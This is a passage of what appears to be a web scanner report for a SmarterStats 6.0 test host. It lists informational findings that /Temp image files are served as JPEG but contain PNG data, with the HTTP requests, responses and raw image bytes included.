.s-[J"...q..a!..ff..|...}.bR.....*. .T......(!....m<....l%    8.4...._...B.C.L_..l!.8..;.$..+    .EU..j.6.E..uiq......48..@.....`..........q......t...,...ZR].q...0....;[.....O~...a..78a.......%K$....Q.....i._... ...E..-.........d.>...v.y.'.8..q..wX`!..TNd...4...I\N..z.....>...t=.C.g..j.3..7zB=:6m...L.m../    .....nL.`......`....E `(...-f.x.}.P*'2...$.96Nj.r"l.....d.r5}f...z..|...yw..xQ..o...jL.Y....    @....w...p...5.m.zp8......xB....z...@.c.....h...Z]..U.v.........6...c@.......g......&.C.z.....D.A...G...{lqg...'.x..........+......Ot..@.{. ....w...pB`.............&......p......p........h'..0...gOE.v]fq?."..G.me.N(..tm..*8..)....^..{.........v.:..!..6.......@...... .....\@....~..?J....l6....c.../..D...I...:    ...>\... ..vh.1..6...61.....b.x.........w...).X.....'...c.e....[IR..S..$Wb6...t(...atHvO...\.em        .U......Z#=....e^B....(.n .u..l^G......"`*`k$:......Tu.l...f...
..X.D.Ih....w..5    )+/.....M..{.R..Y ....^..Y.].:u.........&...m..?...M..]c/........Q.....5l.....&.eZ.=Ka....a..sr.V>d..J......Dmz...a.K..oJG........F...I...N.........g.....:.i.$q.E.,..(f..Y.....aTcR"=.....J....3+.@s.Z}(....#[.r...9.|V...=..St"._.ulF:8..Hl(?.bE......fHT&...+..K..-.nI    .f...#$]/..Zz..
6.Ai-...*.    6.NO..BWq*.........y^!..@'Kq&    ).o,.LOd1".oWZb.fV.......n..`c.e%..{.D.U...b65Vd..f.3~.....s.........8T `'q.B.)....R..,......Y{..x......M. .    .............6.....J....(.s.R...5....'I.....A3y..y...[...oeB.J...1..T...x..Y|....Km    M.h.....$....E..|V.96..J...............[...Ik.l.7..D.o..$.P...6..T....z...|I......,/....I...>E.T.J4..Z.....O.7...f..*wO.B.B8..YM"..7.....Ey..y.db..gV....6...w9....%u.lf...K.Y.aL..KC.....Q........:pr.\.u..L...Y.....>.f.:............`.. .    ..0.c.{...(...'.......b.RpY^W.M+.1sto....>.S.z.MOYY...g..d.@..PN.......eN..}Dq..@I.(....G....z..5Z    ..".....@k<!`
y..4    0Ix.!b. .
6.....8..Z.X..yB.)tiC....~..I@9Hf(..Z.Cw=l...9K..d.p.N...U.;.p!.t2.h.N.@..d..L%..(...2..Ld.([.f.E..7..`.ZSx.\...u.u`.......]_n....&O<0....r.`[............P.....Dq??.(SZ..`.g!l....<k..`..H.'...m...6....,.a..Vm..w+K..6?.]<..@.....`..    (.6..K.(...D.IaQ!...w.H((.uj)(.....Vk.f..<..vH..:l........4.............    M.........06..6c.?z...%PDk....5E....Jo.....5..V(e8....%.k..... ...l.. ...$`.fV....#.......!|.. .a..l...4..M .B.
&K'..[.W.J...    ...zK2.g.|._W..[e..<....{.....`....i `t...4Id...A..;=.w..G.A..4K..M.C......EX.t].I.......f......6;..9....h....F......`.,....,.8.....cqg
{:...;..A..@@.. .4:0h...@).....4..f.v....sSr>......F    @.it`.,...2..g-.BM.6..6W...=..A..@@.. .4:0h....Y.Ik...kr(.....m....un.s8....... ...%.....A.@..@..@..@.D..s..@..@..@..4N..M.............................h....................6.............8..6...... .. .. ...l.. .. .. .. .q..l.. 4..@..@..@................IEND.B`.

10.11. http://vulnerable.smarterstats.6.0.host:9999/Temp/26da1ed6256b4e7f89617f968309aea9.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/26da1ed6256b4e7f89617f968309aea9.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/26da1ed6256b4e7f89617f968309aea9.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB7662C00"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d.. .IDATx^.].......5.F..A1>0Qs#*o.<D...!...E8.S." ..7.../....|.C .9..8..BV....fy...w....P.w..L.L.......s.^..2gO............\@.......N..........B. ..@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@ .B.%
.&..T,.BW`.t.r.6...............|[.....5.D......hE.U.Q.<{..# ....R."/xD....+o...[.s.8....D [BD.N...<U.T%D.-/..j!...[kkk.8r..,G....~.-
0@.h......,......Y.....$F.^$.6^..MX.w...!.#B...d.f."...U#...P2.*...Q.........;...yH.B..    .z.f...$.;.%5....-_yt_|..>5#.q......G......!R.... ......*...Q=(.
..#{u.U..!RAK.mV    .i.|...f.a!r...J.....l!R.../..C......a!..s./A.b.....J.N..;.%5......H-htX..:PT.#..C. D.....Y%..i.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(    ...C,.7.e.!....E.....Q^}&q...F.`.wY.A. D.@.md......I.W..%.^p..~.....(..L....#D.v?!.....?..B.
..F."....3........w.....u.B./.B.n.7...J....
....BW..a..U....XY42.X:.o....|.E..7......2n\...>.p...
........    ..TNxt.XmWA......}......K:.@f.h..2.;MTO.}?...B.
P...(...hAr3!..0!r..+.J...PNTgA.o...>.C.B....F&    ..qdD,8....[>1{.. .}L!
...;....[~.:B$3....$J..#H......B..    #F."#0......._.B...&VCc
..nE.:B$.....|QP.."D....2!.P........8v....%..c.@|!.f)4....q. ....fUm    .|.L.C3V..jd..9.F..hTOv..B...3...EL!*....\y..."`N..G.B$...'....s@.Ii.~iB;....0G....F .V8.......w.....e..S..D.........f.w...=.............)B$.n......cK.s...3.$.....B!t]..uL#dDL.4.....T......,......^..!X!ly....S...$.&....mY.|.F....Zs..|ff.qc....w.s...LX.|.n.!..id. s$D.......=.....(..R..Bd.zS.H.e.=..9;F.I;..MgfD....Xu[c.!2.U .y.M.+i...=.$-D.-..C2w.....P.....m..I..)../.-.|..#D.Y.........zg.5cF...w.)B$.2...*.!j..p......W.(C.n8.v9}....>...cn*.s..-.....=..f.A,.>...D..Jh[.6E..b.......U....'....jJ......C.X.d.....N0A..Z...#....R.6..,vt.fuCl!......b......<. .y.Mes.>.-...../...S.......#[    m.....T.....g.r.........."V...!#2.U&..T..{}di......$D{:_fuCL!r6.2.c...Y.&b.!J.......17...>... v].-.\..jhL!r..vf5..D. D...X9..<.....w<...#D...K.....".z-o.`.....(1hC+..........&...;.!.y.......6.6.......y.M    ..g..~........Y..90A.X....B..Nve&p.5D..P. !..b.o."..+Pt.. .n....{8.....3.....!Z........(..@f....K.ww...OG...f.w.....g Dl.t.&M...V.....u.w,?6....<5...$.P..VR....    ...'i..w.V.3{..........F..y.%..r...d....n.4!.l.|.G..g......Mw..UVW48G...e,...A...-o.2......>.m..9B4...WXmP..'5.v.Z52."V.h5..i..]Y...>.a../.vN.e..D..2!.N...    .&.XI.n..&...07.;.3....#B.....%    ........Bd.s.BD.3{|....M.e.e#{......;...'...<.&.h.....]w.-..Q.y.B....
.+....
!R.../@...0V.I.N....{.#BSd....,?....+.    C.B....FI.B..U...pt...F<...bs.dY.]N.<.${.p.."..;....c........\........14....D.........t.$......O..M..d.{9..b+p.......7|0....D.....-......u42......$    .tk.{0...zJfDK~.$6}..,{.4...    .......V..u.D..a.`.D.f.U?...B....F .V8..%.....R.V..#.rD...3BT|.P`F.~j.fB..U.z.......f.k..I."i..{0..>.._.uDh.,{....;.......8S..Q=|!...;...^.......Vy2.[(.P..b ~...h.........b......02+D^.04ct.f.d...eV.$..?Y-.-.....ry.O..`./D..U....b.v,3[........}fM._..........Q.1~....f....MJ{.@R.....D#./..I..]g../.7A.Y............_.T.....u..f...."IB....>...0.3{j....=U../..#*eD.&.....Pp.... D.c.2..8..I.(.3....4...T....5>..<.+..!......QA......W.{0\..l..?...._.-.........>..|.9"....!#J.......1.;&...>......q..r..VC...w>..9....c!D.X.j..!.:.R.|....g6...b..q..r...%;Gd"...."SHW..2..<...}...cC..z.\Z..f5TKF$W:{..FF..^.......$..% "*I
w.}f+[G8"4.\Z..b5K..U..8T......4J*..t+....!
..._.-.w.9..X...[v.."....V.dD.<.f`+.m..B.......E.s..    _.u.yV.7......;.Y>.7.9":K......_.[.;.Q+..zW......sC[    m......\W.+.,.6-!.P%.6$D...\{....n1..~....G...k....]...V.!D........I..........213..wT..G..........%....s.........VB..7.(8....!.n...;    .Q..}G..Go...:.T..PQf....9.pg[    m............5...lF.:.}^....1.........Q.."[    m....`!.y.i..S....f.~.c....u....3Q.bF.-DnVt......R.....o.Qmt.......i    .9...X....%!Z.1:...>.9..j.d-+.....o.Qm...;..y..C./.`Q....u.....h..L.w..].Yy.o+.m..BTKg.5B..{..C./Lg..B..DB..."NY..`9iM+I.p.Jh[....F...c...5..fL....U.....c....[.,.&3.3[    m....Z!r.w.:.h..uNc.^7.....%t@#..:.(#z...v..v_9<...3[    m....Z...w\.......(.A...|..Q...G.k.(%M......!..xz{.....)D.k.....V%    ..s.*.....H......!..xz.<j].@.l...........{&.m...
...?..c..l%..~C.j#~.......!CB.6...2...5)..../.gt2]......o.Qm....I.......),z4.....y...W*+....-.Rl:. ...Jh[.....;. ?.....1&D......^U.....7..A..l%..~C......c....)D..?.z..s|)N.=...h..a.e./...._.v15-.....!..:.>q...~......Y.hph..}...,?R5.+DKZ...........V.!D.Pw..1....."..........k{....hh........;..VB..7....t..eD..x$.?.;'...`F...+:...6..OB....Xe..;dG..    .VB..7...+...e_
....g.    ..6.6jD...=(....wSi.....o..?....a?..".Y !Z~vp.2xy/A...q.Jh[......v..]ym(w.....E....]f....._...m%...v..y..x..a..."........].U.il......!.3..w.\wC(w..&Q!*........(i}..wR...oR<l.<...jH.....].|t.....<.R.F...V.!D.....On.%.;.ox#...Q...$.>.    ;T?..........,....y...B40vYzz.<...wyG..E!.{...V.!D.(..IL.{[(w..<.
w;.....n.U-8rx..ia......!j...uk*g..Jh[....Y$.w|pg(w6v+!..O...{.H#B...*..u.kg..FJ.........H....{.|}.].................p?.?a]nQH..
S....3..F.....z.......V...U..]U....B.....Xt.94c.....w...5.d.g.[..!.QV......~.#......Nn.....!...]U......!.....{6..z|........._>$.......6c..m%..~C.*Bt..6..[.7....JH...X-i..2.%...(s>.....f.q.....o.Q.h..,.....z.Y.!.+SQ...VH...H......mLl/.....o.Q.W.\.i.uuy...D'..$....h.W........6. ..
u...W.e+.m..BT.^z03:c]..?.$+.14s`JJ.\q......[....G.
.s.f+.m..BT........B..Z.QQ..L.....b..k....k..l%..~C.*..,.;......c.....Q)#Z....2...23........l%..~C...I.o...8xg]....EQ..w...}.3ce....N..u..d......o.Q1..........S.7..?..qdD..h.W.&L........
..0..I..l%..~C.....f|..O.......b.BT...:..+O..I.&Y[    m............8...1."..%!Z....2.....1k+.m..BTd.e.CV....Z..W......~.x...jA'.5r.Jh[........C........dDl~...~.e.......-3.e+.m..BT....{..;{Grfm.c....Qih..#D...O...3...{.Jh[...    ..)....'.3k D|jSF....R)..^%.M.q/[    m..................FFT..^9...Fy|.r.G..VB..7.H.....N.......X.!*....P..........8.....o.....-pN.......#Ya!*    Q.#Bi.y......l.8.....o...gm..p../o@....9.....V.Si's..VB..wO."z.(=.......7:xg.##*gD.    ......._.vQY.l%..~.t!r...~.6..2[#.@.../..V...N)D.l^.........h.'..C.^!.~q7./..=.
idD..h...8..W.....UD...V.{.....Mo^....sM."..%!...P.e...dVD...\...V.M...-L.!...q5..;?D...
.H..hh6...S-.....    ...R.H...~..":.........W....5....NG........
.H... D$...}O,.7A.s!_mm.e..I..e.....O.....H...v.....4r5.;.....*..QLC..z..../.J.<.r...E....D.Mm.;I!.a.-. .y....Kmw.b....v.....#..$.......+...s.Y.b..4G..)..S.................l.;)!.c.....\)f~.'4.i.....Y.....;~+c.bT.'.....".QI..:".vy..G...W*.!k+.m...2.1.N_ q...j1.X..q8......+gus.    ....|......."..K#...=..L.Q..VY.,>:.X...N!"!..nR...f/...D(:.......Z..z....5....of..m...CY."#*    .K...Y(...V...    ,Vd$ld......V.W........{..^'.(.7...../..r.}..\qv.+. D...9B...;.W.....s.    ,N.I.....!...$".,.RL=tK......R..n..4DS..}[.._..sE;...%.....73e.......Y..b.....~7"D..tF9eA...........<DS..........Wl?...fER....
9...$K..U...    ..O(....m....X...4....BD....<...x..........Z.!.
........Ol{..u.D.)/.$..D!......(.v{........]...C%...L..l.;........*1.w?..g.....-..=D..N...c......wY...X .n..Q6.....].LQ.n.T...-..h..G..h....o>..O..{.....-D..m.P..8$.(......b..    b.G...^}.#......G..W.?Glp.......?.^......-.Y"fm.&&m......;...h....V4_B...e. ...z.....].......N.I$...*..h...H.b...Q.=.i.h~{..<l_...x[.7f.u...} ...@[^4...Q..E!"a.p...#

zrAD.Eo..#m...].u:>7..+.:(#...j1t....3.o.V#W8C.......77L.......Q.}..^r...(^h.......1E...AM.J.........w..h.q..y.b.B...*..Qiii..6mB.....1.._......gh.B+.F$.6^..MX.w...-...o..M...OV.;vL?..j..w[..n.....{
.=+Sx|..V.....
..V.T@.-....".!J......................p....n&D.....A.K...7..s..tM>}...F.........Ym.........].aA6...=pob)..X*...k)..7...f...f.w...H.(.=.A..'g.Z........\>/......g.Z.Wp.V....Y.B../..E&.%ojq./..hS..A?,.>..W..?...e<N<......[...U.=..&B..".)....w...W7..~.K.Xp...O.=..,8.....Xw......|J..`..{....7NB....Y
....8.'D.?.Y...    ...:B......o%U......j.JT.J...Qu
.&JY.....~.jV.....X;.!N...nF....8.....&$....R....n..E..o.u...OT..V..J.B.2..D.H.=U2:.G.)2.o.B..vT..kp..g."e(N..D.#o.ds.y....g~+-.{TF.!B.9..Ib.(....h    dD....I.s2Y......fYlGi..;.....e......_.......v....(R....5.~n.z.#J.i..4DK"#.M....U..%=....9.....YjG...    . 2;.r.q...b`].......*...}.).Q......fasJ._.6...?..."...........K.~.....v...ib..c9[2.'..Y.X..y..........I>>..@ ..@...C...... D=...D .u. DY.!...z.......h"..:.........=...Q..d4..d...Q.{..........t2.......(.=...@.@.B..:.M..YG.B....@.. .!....&...#..,#t.Xy......IEND.B`.

10.12. http://vulnerable.smarterstats.6.0.host:9999/Temp/272276131291426282a9ebb0efad2752.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/272276131291426282a9ebb0efad2752.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/272276131291426282a9ebb0efad2752.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:16:25 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB69812D2FDC00"
Content-Type: image/jpeg
Content-Length: 8986
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..".IDATx^.].......h|. A..|..E..qD.y.PPD.d.A...
rN. .P..A..B....8...D|......JR....T~..........._.k....u.....}k.oV....{..f..`.rf.{9..O..0...`!. `.....`!.....f..`!..`.....`!.....f..`!..`.....`!.....f..`!..`.....`!.....f.. D].Xh.--~)...^.*.....d....d w!.b.....U.....Z$o..' V).oL.....3.1...E.P........N.?{..`....ZB.YP...?..E.Ht...)..a.ttt.............qa.8.r..s.......E....(........F?...R..!..!......Q..........L.../D1"T...&.;E[.$v..    .Y....f-..6..o...r......{..~..X)+R...."."...U....bd.X...r.".n.k....re.....j.R...../3...<X2...).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.........P...X....~c.....1`...}........u.U.2..5..5t..Akm.....<X.=g.~.._..cW\.n~....'.._..'VH...j.9#Re,c{.....1`...6....././|.....|1...........Q,...P..m-...R.J.v......]uO....O..e!R....fm......1...... ...R.:."b..G .8.;E......0.D..t.E.l.`.:)......X......\.=..)..o....j....A....f...*.......R.    .......P....dC.,...j.....a.6(..,..0..p..._.a.....O.........~j
Q.H.u..-z....*!..O...$J5...XG.X.t..n.....4+.....c.\&v~.X...YR.>...lW......QM!.9UZ.*!..WE.`..2!..utt.......0....36.TLq...."Y..q...W....1|...../?...p...Id......X}iV..R...f(..2..M.%*........<..............v..2".(z.+$> .1.;...
..3V....'.."..P'fB;t".43._.......Li ..g.;.OT.."^...r....X.g.1.,0.vR3#.....OJv....:....y .}...|.Q..XF..p...)D[>......W..[.a..L...!2.9........j..X.?:.Y`....O^(^.fa.....1...DY`...`...H.p.z.....1..Z.s...l..!..g..g.(....,..s.    h.w.    k..T.8#Ra..-...E....[..{.^+v|. R..1R
.....`..k.....j
......B.=..g.<...d.a....d?;...(T..s...?..;lwY...rP......Mf1....l....=.b..{wz".h....$...U39\c0..fFTY.Q{I.\.....c.......1.3u......?6Ml...).?.OWS......<....npg...;n.-S..T0..._:3.F.~~._....=..6..YX. CJ....M..,D..90g!J'..u.'B.k..g.J!.~h}zCu,(.A;#.... "_..EM.2....c..L...wm.#.}5?..Hm~kizC.,DI....f.2gD..4h..(...^...u?...Gb..o....79(.A;#
_...9dB.Y]."3.l..<...\c........D!.....2....\..i
..53!]......`......a.h..../...[..x....M..~..".:....Q.|.........C.=..#...h..........1.NS...f..1....P......U.U.....%..}.2.'../57.<......\b..hY.....Ym
.~}."..bZ.<.0......}..|.P.....*..6O.=\b..SPO3#
...[<La$.g!r.-.e.....x..........X..=.x..e?.....9....D|..........g.~$.~.pby.......t...t.d/#2....,D.    F4Oy. ./M\b.g..yiP]!Z}.n)D.&M.p.A.O,D..eT.r.`)`....7.>.s.x.........W..f....f........R...3...`...B.zz.."X..{P.....W3.G9x..0.d.`.3..'...    ..u...W.~0....f...;L..Q..,B...T...3.'.-_..[L..R......W.....x.....v)..,
W.`..2.M..M..1./5Z..
...zv....v.I Y.l..Y......+.......y".@j.sCo....0`9t(D.N..6B...Bd#L...<...\a.X\(Z.^&~qvVj...W..~........ifDpI.......6(.OZ....C2S..O.wo..*B T3~9.h.+e?h
.6.....(.P..Xv\a..a.'0.<!.?..z.z......0...BF.4.........Z.,Dj|...<..x]a.w..............m......X."..Y.(.l...."C.-T.<...\`.6D[...T...Zp._....E.......^...|.........)..,z....V..'^8;3.<.    ....c..X..w..A.5*.....uLL.!.*.,....0...fF..4..    Y......d..L...........e......8...>bG...BT.....~.H.....l.%..?.pd..dU.2...V.Z.Dy.`.......\q........x..
|.......
...fA......(..*...(..w...........)..,z..`C...]!6q/..?9.h....X.......PlF..k.dBQQ.~b;.;..<Y....>.<......OIOy....'D.b.....,iv.B.....L...../Dr.~...%%....vtt.........P..q...._....{.......h.x>w.\....-...<.#{B.>._.!.wlB........n.y.&...tt........0`.K.k.!.K.4W.......f.C.!...G.E...em..sK:.m.:}H..)DA.R.6... U...I...GI.O@....p.k...."..!..m...yB4]&<....m.X.0v.B.iZ.......w...U...S..XL.1....?5Q.zB.-...y....nG.lc..DB%C!*eDZ..6a$...Q6<.;....e.6.`C..?N.*e.............P.J...[]z..s..lX.2 9............+...TI.@..{u..V .1`............sD.......sf......j......\fm......{...
.6.,w.;+B...i.vn..u,..&...P..X..1....T.!..G.7I!..?...z..6.....`(D<Gd..qmQ..,v.P..l.....3S.........e?.
Q...gD......<...c.2...d5...f....J.....Dg.;....2.x..K5.#R...
<.m.h..M?........$B ZK{...D61.3.m.NF$.2.........r.`Q2.(S...K1Y..xO.&)..;....9$.......4G.^i.J..=OV.sh......f.C...FO.T.....8......4Sf.a..".."..9....nf.C....3.=!R/.[...`.`..........(......e
.!.......p.V ....A...BT...V.....9#...........a...b.+......*.V_....M.X..v.Bdk.Xlw..X..9.]....b..!x....7j...W.3=.....]o.9".[.*..T..H..'......!.....3...^....h.V...^......0...co...)lm.......:g.kP..X..0.[.K./...]<.    .N.../.........b.-...4......}pf.....-.0.|...z.t.v.....V .0`9S.c!Ra+.[.....1T......y..;..};.
X..zP....E.".<].K<T.$..r.`.2.
S....-W.g=!.-.v...
.............B.|P..,.....\u..k=...].........,.....I....+...(..,j............X.    .n....Y.....@#..Y...e.r.s...y......v) .>.!.v.vY.~..
|..\..BF....9"....<X...gj..[...=}.x.."..B..<Bv......".........x.4..<u...Hu+..~0..........1..s.......E.'.    ...:O.L..,D.n..8.6....Il.".Psggc.....e..&=3HL.........V 60..R.2..B.....J...8....B....kP..X...........^..P.qa!.x...>.w........U.U.A.r.W........u...b.'D.e......1...[h.0#.....]C..=......(....c.....U.K.'Bc...Qu..E'........a.............-...1~...[.P..aF..xm..Bd.I.v(..,*S.p.~.....?.c...a=G...(G.......$.62.......1.....V .......e.w."...............G....Y.........S..O....<!.m.L.....T9L1..K.VS..]..;.5ov.Q2~.Yx"<.+2..`.2g!R    .......    ........5...(3wP.
....'];M!..4..!"<I...t.k#F.@..YP...g`!R...-...El..|....{"4.J.Q..o...{.`..C....U..:..j.'. e.    ,D..a.....Ei.!.u....VD......)o.b......]!.sN...`....utt...........[.^+Ec...Y+...
.<.Y;..>w..J...(i..Gk.J.._...J...71.(..p.~......i.,8....o?.B..E...".p...B.O.LV...%t./...*....@Z...M0.+...t.X.    .......[..`...kGV..P..}h.-...uw>.(..,#&..6...Wz"4.ZYv.......X.....r`....R..4....rf..!x..........,.+.u18#5.0.....,D6X4k...."..p......CC<..n..[~....R,....L90d!r@.b...X.4N.u1.v.r....b.iO.,..V]............(...A9x......b.2...o.^Z..T.......X..^...r.`)if.....`...;6.P.
...X...)';......1L.0D..b/...a.....PZ.O..,D........R......3....B lS^.......X...)';.....Y1......5...b...Z_......B..M9.Q..,%..!X......SC.....RZ.O..,D........R....WL/;y.u..a....
|.~`!.....(....f../v...!.".e...H!..&1.e?..a<.........`...M=.rO.\....=.N.mG....X.P....r.`YiV...u........,.h..
|.~`!.....(....f..,v.o'"...D.O...\......"..s...<XZ..C..u....e.~.........".h...r.`)iF..O....cC<....2r........B..M9.Q..,%........<...!.e.wWn..Y(WP........Q..,+...V...........8..E.sP......9.P..,-.....M......;-w.x........X.0....r.`ii6.....{..'<!rY&........X...)'.....l.:..`....
.x..&.........e......*.lr.i....R.6Y..|.....K~ ..
l...|g.@...:Z..
.`......%...........?..
].Cjc.X.,.j.......>vEOq...xs.=...]-.............ADE.. ..W..T....u._...`U0 (.j.Bd.N..e.<p)..x.^w.(|8X<.......5b....`......K.d...;.XA...1......aNm...{..o|U..H..9..1.n.p.<.gN B...6q.Ly...x.dp    .r.....][...'.eSp..z.. ..L...A.'.z,D..eT.e..........$..uu...}....g......\b.....`W..o.K.3.o....F.....X...d...
.U.
.......FY.....o.xU..;_...7..o?.dU........*~8(.!..`..a1..c^.)...<...3.aN.Y....,B._,...F,..Z.2...b.7.......O..L0...:.*.......D:,q..p._,.`i.*.&.#W.0u....u\..2^.r.9..6..U...B4j..2.!ha..s.A.J...Q..z......9.7>#V.j..b...........;eG..8.P. .9..9$..0.............y..d...w...[/.0....f.Q...b..._z.W.Nu..l...2....'...9.3..2...."p..C...-=<......+d...W..N{..5.3(i.n.74..Jlx.'8.....f..w.Pi.....z....b..s.....3...............
.........z....3..../....8.....7......<.|A.38A.3............0M.v..:p.../...../..J..4[....CNT[...'.k.o..1
..../....=...ME..B..}<X.e.......5..(.;..)..u{...2dP.D#.............`.@0L.q.......b....~.@.P...C..Z.eq^[..?f....S XA0`P.........O.#C.>.5..n..>t....2.....'..2&.G...2...$..s....X...3..+.....b
..w...|A.....>..A6.B.@..YWC
QW. ZZZd)...f}...L.
.4.v]!......m.Ha......    b..H.O..Pga..L.S'.]......>........(l....v..w.pi.8a.h...%....($f. p`g.C...g ..S...C@......Lr.s7x...E.WGd{a1.~.....X......7.Z5.i.e.y.    QWQ.Z.D.D.%.....E D.}<..s...9.W.....{^.]#.Sw......w..Y^.Y..3NX......k.'..........,....'....Gb..e..3<y....k..e>!3./k..pB..P8...........qa.,....`.K....C`.O}.W.<?z.jy.-..,..M.s.r..._#..(?.~?..~.F../#....6....Gq./D.7....R.<r.....-.9%.{............w........:...?.x[............e..mb...\.....b`..}.!D.K3..D.@L..`.4<H..7G$".......d...GiD.f/.....1h:.r5.~h<!.{e
..-...c.....4..9...d.....`!..|>53......q$0..@.........3..4...r.`i.8.......9...&....U..$...yF.8j:.*...Z...W.A...-<a?..Y,.H.c..R...?......}...04....p(.`8...@-$.un.{.Rhk.m.EiP.[.V(...U9:....(}}\.7.....C.q..l....N..    ..1...r...?.`....b.........2.....A8#.|/.Y...Y.7y.AEOx*.............s..3 .<.oT......?j~..O..h1.X
/./...'D1_..14.......8..j.YIU".&.......~.....U..I.D...4-...^.G.Opi.xiV7#..).....(.S..AjFD.....2..!.<i];}....S..W2..,.Mr*Dr..........~.
.]<....?...H..8~..D.-q.du.y..\Wh.+o.."#J....F..pH.|.
.....Z+cw...b(.;.....(.)M......t....Yn.....<W9.......RE........... .....%...(2.^..W.G...M.G.."~..V..'......A.....O.{..}yN..b..He2>/....U..o..k.4.T........ .B$.=.o..D?.~.1S...k.......j..c9[.6~.Wg.m.c.5....i.9.8I..1..@w`...;x.10....Q.;....t..X......3.....5.....@w`...;x.10....Q.;....t..X......3.....5.....@w`...;x.10....Q.;....t..X......3.....5.....@w`...-p.KQ.NY....IEND.B`.

10.13. http://vulnerable.smarterstats.6.0.host:9999/Temp/29bf53d9459f4ad5897ed8fe1e6273c6.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/29bf53d9459f4ad5897ed8fe1e6273c6.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/29bf53d9459f4ad5897ed8fe1e6273c6.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:34 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEAA8BB00"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d.. .IDATx^.].......5.F..A1>0Qs#*o.<D...!...E8.S." ..7.../....|.C .9..8..BV....fy...w....P.w..L.L.......s.^..2gO............\@.......N..........B. ..@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@ .B.%
